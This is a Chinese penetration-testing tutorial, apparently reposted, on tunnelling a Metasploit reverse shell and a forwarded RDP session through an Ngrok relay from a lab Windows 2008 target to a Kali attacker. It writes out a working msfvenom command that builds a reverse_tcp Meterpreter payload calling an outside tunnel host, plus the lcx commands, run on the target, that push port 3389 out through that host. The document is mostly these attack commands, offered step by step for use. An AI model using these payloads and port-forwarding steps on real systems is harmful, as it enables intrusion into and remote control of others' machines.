内容简介:相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透工具了,网上很多工具都能实现,这里推荐Kali地址:192.168.61.130(攻击机地址)靶机win2008: 192.168.61.134(模拟外网私人地址)
相信大家在渗透测试时如果遇到内网IP瞬间心情就不好了,因为自己是内网,目标也是内网,怎么勾搭上?而且像我这等穷人又没钱买死贵死贵的vps搭建云Kali,怎么办?这时候就要借助内网穿透 工具 了,网上很多工具都能实现,这里推荐 Ngrok 。但是我既想通过Ngrok在metaspolit下反弹shell,同时又想把对方的3389端口转发到本地,在meterperter下鱼和熊掌我都要!
Kali地址:192.168.61.130(攻击机地址)
靶机win2008: 192.168.61.134(模拟外网私人地址)
中间跳板ngrok :vipgz4.idcfengye.com
工具:lcx windows版与 linux 版
一、反弹 shell 到本地
1.首先注册个ngrok并配置好需要转接的端口:8848(这里就不在赘述如何配置了,网上教程很多。)
2.在kali下构造生成反弹木马:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=vipgz4.idcfengye.com LPORT=10040 -f exe -a x86 --platform win -o gong32.exe Lhost:为Ngrok服务地址 Lport:为Ngrok分配的隧道端口
3.在Kali中运行Ngrok的客户端:
./sunny clientid Ngrok的ID号
4.Kali攻击机配置监听:
此处的lhost与lport与Ngrok中的配置相同,并开始监听。
5.将生成的木马放到靶机运行:
成功得到通过中转反弹过来的shell。
PS:接下就要将对方的端口转发到我们本地了,以3389端口远程桌面为例。由于是通过Ngrok中转反弹到的shell,所以portfwd命令不能将远程桌面直接在metaspolit框架中实现,这里借助lcx继续进行反弹。
二、转发3389端口到本地
1.在Kali中执行lcx监听和转发命令:
./portmap -m 2 -p1 8848 -p2 33891
P1为本地监听的端口(与ngrok转发的端口一致)
P2为本地转发的端口(随便命名,但不能是已被占用的端口)
2.到靶机中执行lcx端口转发,通过meterperter进入shell执行命令:
lcx -slave vipgz4.idcfengye.com 10040 127.0.0.1 3389
slave后跟Ngrok服务器地址与隧道端口+本地需要转发的端口
看到ngrok客户端多出回弹的消息
3.开始在Kali中连接远程桌面连接:
rdesktop 127.0.0.1:33891
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 使用Java反弹shell
- powershell反弹shell常见方式
- 渗透测试之反弹shell命令分析
- DELPHI黑客编程(二):反弹后门原理实现
- 红队渗透测试之使用 OpenSSL 反弹加密 shell
- 照弹不误:出站端口受限环境下反弹Shell的思考
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。